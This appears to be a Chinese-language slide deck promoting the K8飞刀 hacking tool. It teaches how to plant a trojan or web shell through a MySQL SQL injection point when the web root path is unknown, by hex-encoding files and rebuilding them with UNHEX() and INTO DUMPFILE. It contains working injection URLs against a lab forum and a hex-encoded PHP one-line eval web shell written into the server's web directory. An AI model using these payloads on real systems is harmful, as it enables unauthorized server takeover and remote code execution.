K8飞刀--Mysql注入点远程种马(无物理路径非root权限)解决方案.pptVIP

* Mysql注入点远程种马 K8拉登哥哥 K8飞刀--Mysql注入点远程种马 实现原理 将可执行文件用HEX()编码后，分段导出并UNHEX()解码所有HEX()编码后的文件分段，在导出的文件中重组为完整的文件。 应用场景 有注入点却无法爆出物理路径的情况下，满足导出文件条件，可以考虑用这种方法得到服务器权限。 Mysql导出文件条件 1 Root权限(其实并非root不可 ,具备insert权限即可) 2 可写目录(即使是system权限,用驱动限制也没法写) 如图: 使用sqlmap注入无论是写shell还是执行命令都需要提供物理路径,没路径怎么办? K8飞刀--Mysql注入点远程种马 k8bbs注入漏洞环境为例 注入点: 42/php/k8bbs/news.php?id=3 and 1=2 union select 1,user(),3,4,5 K8飞刀--Mysql注入点远程种马 导出webshell(大家都懂的) 42/php/k8bbs/news.php?id=3 and 1=2 union select 1,2,3,4,unhex(3C3F70687020406576616C28245F504F53545B27746F6D275D293B3F3E) into dumpfile C:/AAWServer/www/php/k82.php;